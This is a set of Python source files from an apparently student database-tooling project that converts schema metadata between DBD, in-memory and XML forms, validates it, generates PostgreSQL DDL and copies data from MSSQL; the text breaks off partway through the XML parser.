"text": "import sys\n\nimport dbd_repr.dbd_to_ram as dbd2ram\nimport ram_repr.ram_to_xml as ram2xml\n\nif len(sys.argv) != 2:\n raise KeyError('Ожидается 2 параметра: путь к файлу с DBD; путь для создания XML.')\n\ndbd = sys.argv[0]\nxml = sys.argv[1]\n\nprint('Создания RAM представления...')\nschemas = dbd2ram.load('dbd_queries_sqlite.cfg', dbd)\n\nprint('Создание XML представления...')\nram2xml.write(schemas, xml)\n\nprint('Выполнение завершено.')\n"
},
{
"alpha_fraction": 0.6073479056358337,
"alphanum_fraction": 0.6153846383094788,
"avg_line_length": 30.10714340209961,
"blob_id": "e200148e8723c072fc781e70feb86e9383efa95a",
"content_id": "b63208aac7be01486990ee49a8cfcba7521d084a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1778,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 56,
"path": "/_test/test_dll_generator.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "import re\nimport unittest\n\nfrom db_deploy.ddl_generator import DdlGenerator\nfrom ram_repr.ram_structure import Domain\nfrom ram_repr.ram_structure import Field\nfrom ram_repr.ram_structure import Schema\nfrom ram_repr.ram_structure import Table\n\n\nclass TestDdlGenerator(unittest.TestCase):\n def setUp(self):\n self.white_space = re.compile(r\"^\\s+\", re.MULTILINE)\n\n self.generator = DdlGenerator()\n self.schema = Schema()\n self.schema.name = 'dbo'\n\n self.domain = Domain()\n self.domain.name = 'Salary'\n self.domain.type = 'string'\n self.domain.char_length = 100\n self.domain.description = 'Зарплата работников'\n\n self.table = Table()\n self.table.name = 'EMPLOYEE_SALARY'\n field1 = Field()\n field1.name = 'Name'\n field1.type = 'string'\n self.table.fields['Name'] = field1\n field2 = Field()\n field2.name = 'Salary'\n field2.domain = 'Salary'\n self.table.fields['Salary'] = field2\n\n def test_create_schema_dll(self):\n ddl = self.generator.create_schema_dll(self.schema)\n self.assertEqual(ddl.replace('\\n', ''), 'CREATE SCHEMA dbo')\n\n def test_create_domain_ddl(self):\n result = self.generator.create_domain_dll(self.domain, self.schema)\n\n ddl = '''\n CREATE DOMAIN dbo.\"Salary\"\n AS varchar(100);\n\n COMMENT ON DOMAIN dbo.\"Salary\"\n IS 'Зарплата работников';\n '''\n self.assertEqual(self.white_space.sub(\"\", ddl).replace('\\n', ''),\n self.white_space.sub(\"\", result).replace('\\n', ''))\n\n\n def test_create_table_ddl(self):\n result = self.generator.create_table_ddl(self.table, self.schema)\n print(result)\n"
},
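The normalization used in these assertions deserves a note: leading whitespace is stripped per line and newlines are then dropped, so only the token layout of the DDL is compared.

```python
# Demonstration of the test's normalization: per-line leading whitespace
# is removed by the MULTILINE regex, then newlines are discarded.
import re

white_space = re.compile(r"^\s+", re.MULTILINE)
ddl = '\n    CREATE SCHEMA dbo\n    '
print(white_space.sub('', ddl).replace('\n', ''))  # CREATE SCHEMA dbo
```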
{
"alpha_fraction": 0.6262312531471252,
"alphanum_fraction": 0.6262312531471252,
"avg_line_length": 33.95754623413086,
"blob_id": "b25695aa783e1d73e36c4a437a844d3e9774a9f1",
"content_id": "a4a34d9d98b4abfbf9119fe8eb3ea9355709ab3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8839,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 212,
"path": "/ram_repr/ram_validation.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "\"\"\" Модуль, содержащий методы проверки корректности структуры Схема, представленной\nв RAM в виде классов.\n\"\"\"\n\n\nfrom ram_repr.ram_structure import Constraint\nfrom ram_repr.ram_structure import ConstraintDetail\nfrom ram_repr.ram_structure import Domain\nfrom ram_repr.ram_structure import Field\nfrom ram_repr.ram_structure import Index\nfrom ram_repr.ram_structure import IndexDetail\nfrom ram_repr.ram_structure import Schema\nfrom ram_repr.ram_structure import Table\n\n\ndef validate_schema(schema: Schema):\n \"\"\" Проверить корректность данных схемы (произвести валидацию)\n\n :param schema: объект схемы к валидации.\n :return: None\n \"\"\"\n try:\n # Выполняется валидация объекта схемы.\n _validate_schema(schema)\n # Выполняется валидация каждой из таблиц схемы.\n for table in schema.tables.values():\n try:\n _validate_table(table)\n for field in table.fields.values():\n try:\n _validate_field(field, schema)\n except ValidationError as err:\n raise ValidationError('Поле.' + str(err))\n # Выполняется валидация каждого ограничения таблицы.\n for constraint in table.constraints:\n try:\n _validate_constraint(constraint, table, schema)\n # Выполняется валидация деталей ограничения.\n for detail in constraint.details:\n try:\n _validate_constraint_detail(detail, table)\n except ValidationError as ex:\n raise ValidationError('Деталь ограничения.' + str(ex))\n except ValidationError as ex:\n raise ValidationError('Ограничение.' + str(ex))\n # Выполняется валидация каждого индекса таблицы.\n for index in table.indexes:\n try:\n _validate_index(index, table)\n # Выполняется валидация деталей индекса.\n for detail in index.details:\n try:\n _validate_index_detail(detail, table)\n except ValidationError as ex:\n raise ValidationError('Деталь индекса.' + str(ex)) # Производится\n except ValidationError as ex: # каскадный\n raise ValidationError('Индекс. ' + str(ex)) # проброс\n except ValidationError as ex: # исключений.\n raise ValidationError('Таблица ' + str(table.name) + '. ' + str(ex))\n except ValidationError as ex:\n raise ValidationError('Схема ' + str(schema.name) + '. 
' + str(ex))\n\n\ndef _validate_schema(schema: Schema):\n    \"\"\" Произвести валидацию объекта схемы.\n\n    :return: None\n    \"\"\"\n    if schema.name is None:\n        raise EmptyRequiredPropertyError('name')\n\n\ndef _validate_domain(domain: Domain, schema: Schema):\n    \"\"\" Произвести валидацию объекта домена базы.\n\n    :return: None\n    \"\"\"\n    if domain.name is None:\n        raise EmptyRequiredPropertyError('name')\n    if domain.type is None:\n        raise EmptyRequiredPropertyError('type')\n    if domain.type not in schema.data_types:\n        raise UnsupportedDataTypeError(domain.type)\n\n\ndef _validate_table(table: Table):\n    \"\"\" Произвести валидацию объекта таблицы.\n\n    :return: None\n    \"\"\"\n    if table.name is None:\n        raise EmptyRequiredPropertyError('name')\n\n\ndef _validate_field(field: Field, schema: Schema):\n    \"\"\" Произвести валидацию объекта поля базы.\n\n    :return: None\n    \"\"\"\n    if field.name is None:\n        raise EmptyRequiredPropertyError('name')\n    if field.domain is None and field.type is None:\n        raise EmptyRequiredPropertyError('domain, type')\n    if field.type is not None and field.type not in schema.data_types:\n        raise UnsupportedDataTypeError(field.type)\n    if field.domain is not None and field.domain not in schema.domains:\n        raise ElementReferenceError(field.domain)\n\n\ndef _validate_constraint(constraint: Constraint, table: Table, schema: Schema):\n    \"\"\" Произвести валидацию объекта ограничения базы.\n\n    :return: None\n    \"\"\"\n    if constraint.kind is None:\n        raise EmptyRequiredPropertyError('kind')\n    elif constraint.kind == 'PRIMARY' \\\n            and any([key for key in table.constraints if key.kind == 'PRIMARY' and key != constraint]):\n        raise UniqueViolationError('PRIMARY')\n    elif constraint.kind != 'FOREIGN' \\\n            and (constraint.reference is not None or constraint.constraint is not None):\n        raise ForeignKeyError()\n    elif constraint.reference is not None and constraint.reference not in schema.tables:\n        raise ElementReferenceError(constraint.reference)\n\n\ndef _validate_constraint_detail(detail: ConstraintDetail, table: Table):\n    \"\"\" Произвести валидацию объекта детали ограничения.\n\n    :return: None\n    \"\"\"\n    if detail.value is None:\n        raise EmptyRequiredPropertyError('value')\n    elif detail.value not in table.fields:\n        raise ElementReferenceError(detail.value)\n\n\ndef _validate_index(index: Index, table: Table):\n    \"\"\" Произвести валидацию объекта индекса.\n\n    :return: None\n    \"\"\"\n    pass\n\n\ndef _validate_index_detail(detail: IndexDetail, table: Table):\n    \"\"\" Произвести валидацию объекта детали индекса.\n\n    :return: None\n    \"\"\"\n    if detail.value is None:\n        raise EmptyRequiredPropertyError('value')\n    if detail.value not in table.fields:\n        raise ElementReferenceError(detail.value)\n\n\nclass ValidationError(Exception):\n    \"\"\" Подкласс исключений, порождаемых в процессе валидации схемы.\n    \"\"\"\n    pass\n\n\nclass EmptyRequiredPropertyError(ValidationError):\n    \"\"\" Подкласс исключений, порождаемых в случае отсутствия определения обязательных\n    свойств в структуре схемы.\n    \"\"\"\n    def __init__(self, prop):\n        self.prop = prop\n\n    def __str__(self):\n        return 'Не определено обязательное свойство \\\"' + self.prop + '\\\"'\n\n\nclass UnsupportedDataTypeError(ValidationError):\n    \"\"\" Подкласс исключений, порождаемых в случае использования неподдерживаемых\n    типов данных.\n    \"\"\"\n    def __init__(self, _type):\n        self.type = _type\n\n    def __str__(self):\n        return 'Задан неподдерживаемый тип данных \\\"' + self.type + '\\\"'\n\n\nclass ElementReferenceError(ValidationError):\n    \"\"\" Подкласс исключений, порождаемых в случае обнаружения ссылок на неопределенные\n    элементы Схемы.\n    \"\"\"\n    def __init__(self, name):\n        self.name = name\n\n    def __str__(self):\n        return 'Задана ссылка на неопределенный элемент \\\"' + self.name + '\\\"'\n\n\nclass UniqueViolationError(ValidationError):\n    \"\"\" Подкласс исключений, порождаемых в случае нарушения уникальности элементов\n    в разрезе некоторого свойства.\n    \"\"\"\n    def __init__(self, name):\n        self.name = name\n\n    def __str__(self):\n        return 'Элемент заданного типа с именем \\\"' + self.name + '\\\" уже определен'\n\n\nclass ForeignKeyError(ValidationError):\n    \"\"\" Подкласс исключений, порождаемых в случае некорректного задания структуры\n    Ограничения \"Внешний ключ\".\n    \"\"\"\n    def __str__(self):\n        return 'Неверная структура ограничения \"Внешний ключ\"'\n"
},
{
"alpha_fraction": 0.5400857925415039,
"alphanum_fraction": 0.5400857925415039,
"avg_line_length": 23.844263076782227,
"blob_id": "b6ebd2692720666ef2aa09dbaee7cfa4fcaf2e70",
"content_id": "4e1e3bed9ef2b5f621fd3baae9c0d85b96c25e4c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3348,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 122,
"path": "/ram_repr/ram_structure.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "\"\"\" Модуль, содержащий реализации классов представления базы в RAM.\n\"\"\"\n\n\nclass Schema:\n \"\"\" Класс, моделирующий схему базы.\n \"\"\"\n def __init__(self):\n self.fulltext_engine = None\n self.version = None\n self.name = None\n self.description = None\n\n self.domains = {}\n self.tables = {}\n self.data_types = ('STRING', 'SMALLINT', 'INTEGER', 'WORD', 'BOOLEAN', 'FLOAT', 'CURRENCY', 'BCD', 'FMTBCD',\n 'DATE', 'TIME', 'DATETIME', 'TIMESTAMP', 'BYTES', 'VARBYTES', 'BLOB', 'MEMO', 'GRAPHIC',\n 'FMTMEMO', 'FIXEDCHAR', 'WIDESTRING', 'LARGEINT', 'COMP', 'ARRAY', 'FIXEDWIDECHAR',\n 'WIDEMEMO', 'CODE', 'RECORDID', 'SET', 'PERIOD', 'BYTE'\n )\n\n\nclass Domain:\n \"\"\" Класс, реализующий представление домена в RAM.\n \"\"\"\n def __init__(self):\n self.name = None\n self.description = None\n self.type = None\n self.align = None\n self.width = None\n self.length = None\n self.precision = None\n self.char_length = None\n self.scale = None\n\n self.case_sensitive = False\n self.show_null = False\n self.show_lead_nulls = False\n self.thousands_separator = False\n self.summable = False\n\n\nclass Table:\n \"\"\" Класс, моделирующий таблицу базы в RAM.\n \"\"\"\n def __init__(self):\n self.name = None\n self.description = None\n self.temporal_mode = None\n self.means = None\n\n self.add = False\n self.edit = False\n self.delete = False\n\n self.fields = {}\n self.indexes = []\n self.constraints = []\n\n\nclass Field:\n \"\"\" Класс, моделирующий поле базы в RAM.\n \"\"\"\n def __init__(self):\n self.name = None\n self.rname = None\n self.domain = None\n self.type = None\n self.description = None\n\n self.input = False\n self.edit = False\n self.show_in_grid = False\n self.show_in_details = False\n self.is_mean = False\n self.autocalculated = False\n self.required = False\n\n\nclass Constraint:\n \"\"\" Класс, моделирующий ограничение базы в RAM.\n \"\"\"\n def __init__(self):\n self.name = None\n self.kind = None\n self.reference = None\n self.constraint = None\n self.expression = None\n self.cascading_delete = None\n\n self.has_value_edit = False\n\n self.details = []\n\n\nclass ConstraintDetail:\n \"\"\" Класс, моделирующий деталь ограничения базы в RAM.\n \"\"\"\n def __init__(self):\n self.value = None\n\n\nclass Index:\n \"\"\" Класс, моделирующий представление индекса базы в RAM.\n \"\"\"\n def __init__(self):\n self.name = None\n self.kind = None\n\n self.local = False\n\n self.details = []\n\n\nclass IndexDetail:\n \"\"\" Класс, моделирующий деталь индекса в базе.\n \"\"\"\n def __init__(self):\n self.value = None\n self.expression = None\n self.descend = None\n"
},
{
"alpha_fraction": 0.4821607172489166,
"alphanum_fraction": 0.4854951798915863,
"avg_line_length": 40.65277862548828,
"blob_id": "b5e08a98e6f98191fb7c4a0662f6dd9a13d2a836",
"content_id": "3a914ed0293c4abd134ea179a3bcc89d9ac63e5f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2999,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 72,
"path": "/db_replication/replication.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "import configparser\nimport pyodbc\n\nimport postgresql\n\nimport db_deploy.ddl_applying as ddl\nimport dbd_repr.dbd_to_ram as dbd2ram\n\n\nclass Replicator:\n def __init__(self, db_name: str):\n self.db_name = db_name\n self.schemas = dbd2ram.load(queries='../dbd_queries_mssql.cfg', db_config='../database.cfg')\n config = configparser.ConfigParser()\n config.read('../database.cfg', 'utf-8')\n\n self.mssql_server = config.get('SERVER', 'mssql_server')\n self.in_conn = pyodbc.connect(self.mssql_server)\n self.cursor = self.in_conn.cursor()\n\n self.postgres_server = config.get('SERVER', 'postgres_server')\n self.out_conn = postgresql.open(self.postgres_server)\n\n def __exit__(self):\n self.in_conn.close()\n self.out_conn.close()\n\n def create_empty_database(self):\n db = ddl.DbCreationConnection('../database.cfg', '../dbd_queries_mssql.cfg')\n db.deploy(db_name=self.db_name, schemas=self.schemas)\n self.out_conn.close()\n self.out_conn = postgresql.open(self.postgres_server + '/' + self.db_name.lower())\n\n def transfer_data(self):\n self.out_conn.execute('BEGIN TRANSACTION;')\n self.out_conn.execute('SET CONSTRAINTS ALL DEFERRED;')\n for schema in self.schemas:\n for table in schema.tables.values():\n self.cursor.execute(self.create_select_query(schema, table))\n batch = self.cursor.fetchmany(500)\n while len(batch) > 0:\n # batch_query = 'BEGIN TRANSACTION;\\n'\n batch_query = ''\n batch_query += ';\\n'.join(\n self.create_insert_query(schema, table, row)\n for row\n in batch\n )\n # batch_query += ';\\nCOMMIT TRANSACTION;'\n self.out_conn.execute(batch_query)\n batch = self.cursor.fetchmany(500)\n self.out_conn.execute('COMMIT TRANSACTION;')\n\n def create_select_query(self, schema, table):\n query = 'SELECT ' + ', '.join(['[' + field + ']' for field in table.fields]) + ' '\\\n 'FROM [' + schema.name + '].[' + table.name + ']'\n return query\n\n def create_insert_query(self, schema, table, values):\n query = 'INSERT INTO ' + '\"' + schema.name + '\".\"' + table.name + '\" '\\\n '(' + ', '.join(['\"' + field + '\"' for field in table.fields]) + ') '\\\n 'VALUES(' + ', '.join(\n ['\\'' +\n str(value)\n .replace('\\'', ' ')\n + '\\''\n if value is not None\n else 'NULL'\n for value\n in values\n ]) + ')'\n return query\n"
},
{
"alpha_fraction": 0.6209514141082764,
"alphanum_fraction": 0.6214575171470642,
"avg_line_length": 33.46511459350586,
"blob_id": "e05a652119bf7e1cd1504077c6c0394a42f20009",
"content_id": "5a9ecae24942bc09d00c1720305c7244f900738c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6910,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 172,
"path": "/db_deploy/ddl_applying.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "\"\"\" Модуль, содержащий методы, позволяющие сгенерировать пустую базу PostgreSQL, получив на вход файл с\nреляционным, либо текстовым предтсавлением метаданных.\n\"\"\"\nimport configparser\n\nimport postgresql\n\nfrom db_deploy.ddl_generator import DdlGenerator\nfrom dbd_repr import dbd_to_ram\nfrom ram_repr.ram_structure import Constraint\nfrom ram_repr.ram_structure import Domain\nfrom ram_repr.ram_structure import Index\nfrom ram_repr.ram_structure import Schema\nfrom ram_repr.ram_structure import Table\nfrom xml_repr import xml_to_ram\n\n\nclass DbCreationConnection:\n \"\"\" Подключение к серверу БД, реализующее методы создания пустой базы.\n \"\"\"\n def __init__(self, server_config, queries: str):\n self.queries = queries\n self.file = open(server_config, encoding='utf-8')\n self.config = configparser.ConfigParser()\n self.config.read_file(self.file)\n self.conn = postgresql.open(self.config.get('SERVER', 'postgres_server'))\n self.gen = DdlGenerator()\n\n def __exit__(self):\n self.conn.close()\n\n def begin_transaction(self):\n \"\"\" Стартовать транзакцию.\n\n :return: None\n \"\"\"\n self.conn.execute('BEGIN TRANSACTION;')\n\n def commit(self):\n \"\"\" Зафиксировать транзакцию.\n\n :return: None\n \"\"\"\n self.conn.execute('COMMIT;')\n\n def create_and_connect_database(self, db_name: str):\n \"\"\" Создать на сервере новую БД и сделать ее активной.\n\n :param db_name: название создаваемой БД\n :return: None`\n \"\"\"\n self.conn.execute('DROP DATABASE IF EXISTS ' + db_name)\n self.conn.execute('CREATE DATABASE ' + db_name)\n self.conn.close()\n self.conn = postgresql.open(self.config.get('SERVER', 'postgres_server') + '/' + db_name.lower())\n\n def create_schema(self, schema: Schema):\n \"\"\" Создать в БД схему.\n\n :param schema: объект схемы.\n :return: None\n \"\"\"\n ddl = self.gen.create_schema_dll(schema)\n self.conn.execute(ddl)\n\n def create_domain(self, domain: Domain, schema: Schema):\n \"\"\" Создать в БД домен.\n\n :param domain: объект домена.\n :param schema: объект схемы.\n :return: None\n \"\"\"\n ddl = self.gen.create_domain_dll(domain, schema)\n self.conn.execute(ddl)\n\n def create_table(self, table: Table, schema: Schema):\n \"\"\" Создать таблицу в БД.\n\n :param table: объект таблицы.\n :param schema: объект схемы.\n :return: None\n \"\"\"\n ddl = self.gen.create_table_ddl(table, schema)\n self.conn.execute(ddl)\n\n def create_constraint(self, constraint: Constraint, table: Table, schema: Schema):\n \"\"\" Создать ограничение в БД.\n\n :param constraint: объект индекса.\n :param table: объект таблицы.\n :param schema: объект схемы.\n :return: None\n \"\"\"\n ddl = self.gen.create_constraint_ddl(constraint, table, schema)\n print(ddl)\n self.conn.execute(ddl)\n\n def create_index(self, index: Index, table: Table, schema: Schema):\n \"\"\" Создать индекс в БД.\n\n :param index: объект индекса.\n :param table: объект таблицы.\n :param schema: объект схемы.\n :return: None\n \"\"\"\n ddl = self.gen.create_index_ddl(index, table, schema)\n self.conn.execute(ddl)\n\n def deploy(self, db_name: str, repr_file: str=None, schemas: list=None):\n \"\"\" Создать пустую базу данных PostgreSQL из реляционного, либо текстового представления метеданных.\n\n :param db_name: название создаваемой базы данных.\n :param repr_file: файл текстового, либо реляционного представления метеданных.\n :param server_config: файл с конфигурацией сервера PostgreSQL\n :return: None\n \"\"\"\n if not schemas:\n if repr_file.endswith('.xml'):\n schemas = 
xml_to_ram.read(repr_file)\n elif repr_file.endswith('.db'):\n schemas = dbd_to_ram.load(queries=self.queries, db_file=repr_file)\n else:\n raise UnsupportedFileException()\n\n if schemas is None or len(schemas) == 0:\n raise UnsuccessfulTryException()\n\n self.create_and_connect_database(db_name)\n\n scripts = []\n scripts_foreign = []\n\n for schema in schemas:\n if len(schema.tables) == 0:\n continue\n scripts.append(self.gen.create_schema_dll(schema))\n for domain in schema.domains.values():\n scripts.append(self.gen.create_domain_dll(domain, schema))\n\n for table in schema.tables.values():\n scripts.append(self.gen.create_table_ddl(table, schema))\n\n for index in table.indexes:\n scripts.append(self.gen.create_index_ddl(index, table, schema))\n\n for constraint in table.constraints:\n if constraint.kind.upper() == 'FOREIGN':\n scripts_foreign.append(self.gen.create_constraint_ddl(constraint, table, schema))\n else:\n scripts.append(self.gen.create_constraint_ddl(constraint, table, schema))\n\n deploy = 'BEGIN TRANSACTION;'\n deploy += '\\n'.join(scripts)\n deploy += '\\n'.join(scripts_foreign)\n deploy += 'COMMIT;'\n self.conn.execute(deploy)\n\n\nclass UnsupportedFileException(Exception):\n \"\"\" Подкласс исключений, порождаемых в следствие невозможности открытия файла\n с целью считывания из него представления метеданных.\n \"\"\"\n def __str__(self):\n return 'Не удалось создать пустую БД. Неподдерживаемый файл.'\n\n\nclass UnsuccessfulTryException(Exception):\n \"\"\" Подкласс исключений, порождаемых в следсвтвие неуспешной попытки считвания\n метаданных из файла.\n \"\"\"\n def __str__(self):\n return 'Не удалось создать пустую БД. Считывание схемы из файла закончилось неудачей.'\n"
},
{
"alpha_fraction": 0.5678830146789551,
"alphanum_fraction": 0.5679500699043274,
"avg_line_length": 33.038814544677734,
"blob_id": "0698b2d89370f279f0d9f90e6763643105063516",
"content_id": "39b5c915fb59e606bde858f73887eabefe8f83c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16550,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 438,
"path": "/xml_repr/xml_to_ram.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "from xml.dom.minidom import parse\n\nfrom ram_repr.ram_structure import Constraint\nfrom ram_repr.ram_structure import ConstraintDetail\nfrom ram_repr.ram_structure import Domain\nfrom ram_repr.ram_structure import Field\nfrom ram_repr.ram_structure import Index\nfrom ram_repr.ram_structure import IndexDetail\nfrom ram_repr.ram_structure import Schema\nfrom ram_repr.ram_structure import Table\nfrom ram_repr.ram_validation import validate_schema\n\n\ndef read(path):\n \"\"\" Считать модель базы из XML-файла.\n\n :param path: путь к XML-файлу с текстовым представлением базы.\n :return: список схем базы (на случай, если их более 1)\n \"\"\"\n schemas = []\n dom = parse(path)\n for child in dom.childNodes:\n if child.tagName == 'dbd_schema':\n schema = _parse_schema(child)\n validate_schema(schema)\n schemas.append(schema)\n else:\n raise UnsupportedTagError(child.tagName)\n return schemas\n\n\ndef _parse_schema(dom_schema):\n \"\"\" Преобразовать dom-структуру, представляющу схему базы, в объект.\n\n :param dom_schema: dom-структура схемы.\n :return: объект схемы.\n \"\"\"\n try:\n schema = _create_schema(dom_schema._attrs)\n except UnsupportedAttributeError as ex:\n raise ParseError('Не удалось создать схему. ' + str(ex))\n try:\n for child in dom_schema.childNodes:\n if _check_node(child):\n continue\n if child.tagName == 'domains':\n _parse_domain(schema, child)\n elif child.tagName == 'tables':\n _parse_table(schema, child)\n elif child.tagName != 'custom':\n raise UnsupportedTagError(child.tagName)\n except ParseError as ex:\n raise ParseError('Схема ' + schema.name + ': ' + str(ex))\n return schema\n\n\ndef _parse_domain(schema, dom):\n \"\"\" Преобразовать список dom-элементов, представляющих домены, в список доменов схемы.\n\n :param schema: схема, содержащая получаемые домены.\n :param dom: список dom-объектов доменов.\n :return: None\n \"\"\"\n domains = dom.childNodes\n try:\n for domain_element in domains:\n if _check_node(domain_element):\n continue\n if domain_element.tagName != 'domain':\n raise UnsupportedTagError(domain_element.tagName)\n domain = _create_domain(domain_element._attrs)\n if domain.name in schema.domains:\n raise UniqueViolationError(domain.name)\n schema.domains[domain.name] = domain\n except ParseError as ex:\n raise ParseError('Домен. 
' + str(ex))\n\n\ndef _parse_table(schema, dom):\n \"\"\" Проебразовать список dom-элементов, представляющих таблицы, в список таблиц схемы.\n\n :param schema: схема, содержащая получаемые таблицы.\n :param dom: список dom-объектов таблиц.\n :return: None\n \"\"\"\n tables = dom.childNodes\n for table_element in tables:\n if _check_node(table_element):\n continue\n if table_element.tagName != 'table':\n raise UnsupportedTagError(table_element.tagName)\n table = _create_table(table_element._attrs)\n if table.name in schema.tables:\n raise UniqueViolationError(table.name)\n schema.tables[table.name] = table\n\n try:\n for child in table_element.childNodes:\n if _check_node(child):\n continue\n if child.tagName == 'field':\n field = _create_field(child._attrs)\n if field.name in table.fields:\n raise UniqueViolationError(field.name)\n table.fields[field.name] = field\n\n elif child.tagName == 'index':\n index = _create_index(child._attrs)\n table.indexes.append(index)\n for detail_node in child.childNodes:\n if _check_node(detail_node):\n continue\n if detail_node.tagName != 'item':\n raise UnsupportedTagError(detail_node.tagName)\n detail = _create_index_detail(detail_node._attrs)\n index.details.append(detail)\n\n elif child.tagName == 'constraint':\n constraint = _create_constraint(child._attrs)\n table.constraints.append(constraint)\n for detail_node in child.childNodes:\n if _check_node(detail_node):\n continue\n if detail_node.tagName != 'item':\n raise UnsupportedTagError(detail_node.tagName)\n detail = _create_constraint_detail(detail_node._attrs)\n constraint.details.append(detail)\n\n else:\n raise UnsupportedTagError(table_element.tagName)\n except ParseError as ex:\n raise ParseError('Таблица: \\\"' + table.name + '\\\". ' + str(ex))\n\n\ndef _check_node(node):\n \"\"\" Проверить узел dom-структуры.\n\n :param node: узел к проверке.\n :return: исключение в случае непустого узла.\n \"\"\"\n if node.nodeType == node.TEXT_NODE:\n if node.nodeValue.strip() != '':\n raise UnsupportedTagError(node.nodeValue)\n return True\n return False\n\n\ndef _create_schema(attr_dict):\n \"\"\" Создать объект Схемы, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dom-элемента.\n :return: объект Схемы.\n \"\"\"\n schema = Schema()\n for attr in attr_dict:\n if attr == 'name':\n schema.name = attr_dict[attr].value\n elif attr == 'fulltext_engine':\n schema.fulltext_engine = attr_dict[attr].value\n elif attr == 'version':\n schema.version = attr_dict[attr].value\n elif attr == 'description':\n schema.description = attr_dict[attr].value\n else:\n raise UnsupportedAttributeError(attr)\n return schema\n\n\ndef _create_domain(attr_dict):\n \"\"\" Создать объект Домена, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dom-элемента.\n :return: объект Домена.\n \"\"\"\n domain = Domain()\n for attr in attr_dict:\n if attr == 'name':\n domain.name = attr_dict[attr].value\n elif attr == 'type':\n domain.type = attr_dict[attr].value\n elif attr == 'align':\n domain.align = attr_dict[attr].value\n elif attr == 'width':\n domain.width = attr_dict[attr].value\n elif attr == 'char_length':\n domain.char_length = attr_dict[attr].value\n elif attr == 'description':\n domain.description = attr_dict[attr].value\n elif attr == 'length':\n domain.length = attr_dict[attr].value\n elif attr == 'scale':\n domain.scale = attr_dict[attr].value\n elif attr == 'precision':\n domain.precision = attr_dict[attr].value\n elif attr == 'props':\n for prop in attr_dict[attr].value.split(', '):\n if prop == 
'case_sensitive':\n domain.case_sensitive = True\n elif prop == 'show_null':\n domain.show_null = True\n elif prop == 'show_lead_nulls':\n domain.show_lead_nulls = True\n elif prop == 'thousands_separator':\n domain.thousands_separator = True\n elif prop == 'summable':\n domain.summable = True\n else:\n raise UnsupportedPropertyError(prop)\n else:\n raise UnsupportedAttributeError(attr)\n return domain\n\n\ndef _create_table(attr_dict):\n \"\"\" Создать объект Таблицы, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dom-элемента.\n :return: объект Таблицы.\n \"\"\"\n table = Table()\n for attr in attr_dict:\n if attr == 'name':\n table.name = attr_dict[attr].value\n elif attr == 'description':\n table.description = attr_dict[attr].value\n elif attr == 'props':\n for prop in attr_dict[attr].value.split(', '):\n if prop == 'add':\n table.add = True\n elif prop == 'edit':\n table.edit = True\n elif prop == 'delete':\n table.delete = True\n else:\n raise UnsupportedPropertyError(prop)\n else:\n raise UnsupportedAttributeError(attr)\n return table\n\n\ndef _create_field(attr_dict):\n \"\"\" Создать объект Поля, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dom-элемента.\n :return: объект Поля.\n \"\"\"\n field = Field()\n for attr in attr_dict:\n if attr == 'name':\n field.name = attr_dict[attr].value\n elif attr == 'rname':\n field.rname = attr_dict[attr].value\n elif attr == 'domain':\n field.domain = attr_dict[attr].value\n elif attr == 'type':\n field.type = attr_dict[attr].value\n elif attr == 'description':\n field.description = attr_dict[attr].value\n elif attr == 'props':\n for prop in attr_dict[attr].value.split(', '):\n if prop == 'input':\n field.input = True\n elif prop == 'edit':\n field.edit = True\n elif prop == 'show_in_grid':\n field.show_in_grid = True\n elif prop == 'show_in_details':\n field.show_in_details = True\n elif prop == 'is_mean':\n field.is_mean = True\n elif prop == 'autocalculated':\n field.autocalculated = True\n elif prop == 'required':\n field.required = True\n else:\n raise UnsupportedPropertyError(prop)\n else:\n raise UnsupportedAttributeError(attr)\n return field\n\n\ndef _create_constraint(attr_dict):\n \"\"\" Создать объект Ограничения, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dom-элемента.\n :return: объект Ограничения.\n \"\"\"\n constraint = Constraint()\n\n if attr_dict is None:\n return constraint\n\n for attr in attr_dict:\n if attr == 'name':\n constraint.name = attr_dict[attr].value\n elif attr == 'kind':\n constraint.kind = attr_dict[attr].value\n elif attr == 'items':\n detail = ConstraintDetail()\n detail.value = attr_dict[attr].value\n constraint.details.append(detail)\n elif attr == 'reference':\n constraint.reference = attr_dict[attr].value\n elif attr == 'constraint':\n constraint.constraint = attr_dict[attr].value\n elif attr == 'expression':\n constraint.expression = attr_dict[attr].value\n elif attr == 'props':\n for prop in attr_dict[attr].value.split(', '):\n if prop == 'has_value_edit':\n constraint.has_value_edit = True\n elif prop == 'cascading_delete':\n constraint.cascading_delete = False\n elif prop == 'full_cascading_delete':\n constraint.cascading_delete = True\n else:\n raise UnsupportedPropertyError(prop)\n else:\n raise UnsupportedAttributeError(attr)\n return constraint\n\n\ndef _create_index(attr_dict):\n \"\"\" Создать объект Индекса, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dom-элемента.\n :return: объект Индекса.\n \"\"\"\n index = Index()\n\n if 
